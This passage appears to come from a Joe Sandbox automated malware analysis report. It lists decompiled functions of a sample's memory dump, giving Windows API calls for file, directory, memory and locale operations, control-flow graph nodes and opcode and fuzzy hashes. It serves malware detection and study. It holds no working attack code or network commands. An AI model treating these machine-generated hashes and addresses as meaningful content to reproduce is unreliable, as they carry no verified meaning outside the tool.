                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 730355536-0
                                                                                                                                                                                                                                          • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                                                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: .tmp$y@
                                                                                                                                                                                                                                          • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                          • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                                                                                                                          • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: .tmp$y@
                                                                                                                                                                                                                                          • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                          • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                                                                                                                          • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                          • String ID: .tmp
                                                                                                                                                                                                                                          • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                          • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                                                                                                                          • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 371 40781b 360->371 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 384 407912-407917 363->384 385 4078ed-407910 363->385 381 407820-407823 364->381 382 407890-407893 364->382 370 4077b5 365->370 372 407743 365->372 366->370 375 4077b6-4077b7 370->375 376 4077f7-4077f8 370->376 377 40781e-40781f 371->377 378 407746-407747 372->378 379 4077b9 372->379 375->379 376->349 377->381 378->342 380 4077bb-4077cd 378->380 379->380 380->358 386 4077cf-4077d4 380->386 387 407824 381->387 388 407898 381->388 382->388 385->384 385->385 386->355 392 4077d6-4077de 386->392 390 407825 387->390 391 40789a 387->391 388->391 393 407896-407897 390->393 394 407826-40782d 390->394 395 40789f 391->395 392->345 404 4077e0 392->404 393->388 397 4078a1 394->397 398 40782f 394->398 395->397 400 4078a3 397->400 401 4078ac 397->401 402 407832-407833 398->402 403 4078a5-4078aa 398->403 400->403 405 4078ae-4078af 401->405 402->355 402->377 403->405 404->376 405->395 406 4078b1-4078bd 405->406 406->388 407 4078bf-4078c0 406->407
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                          • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                                                                                                                          • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 427 4020e2-4020ea 421->427 428 4020ef-40211b call 402f54 421->428 431 402124-40213b 422->431 423->419 425 402052-402060 423->425 424->423 429 402062-402066 425->429 430 40207c-402080 425->430 427->428 428->420 434 402068 429->434 435 40206b-40207a 429->435 437 402082 430->437 438 402085-4020a0 430->438 439 402147 431->439 440 40213d-402142 RtlLeaveCriticalSection 431->440 434->435 441 4020a2-4020c6 call 402f54 435->441 437->438 438->441 440->439 441->420
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                                                                                                                                                            • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                            • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                            • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                            • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 296031713-0
                                                                                                                                                                                                                                          • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                                                                                                                          • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2987862817-0
                                                                                                                                                                                                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1948546556-0
                                                                                                                                                                                                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01F403AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                                                                                                                                                            • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                                                                                                                                                            • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1658689577-0
                                                                                                                                                                                                                                          • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                                                                                                                          • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
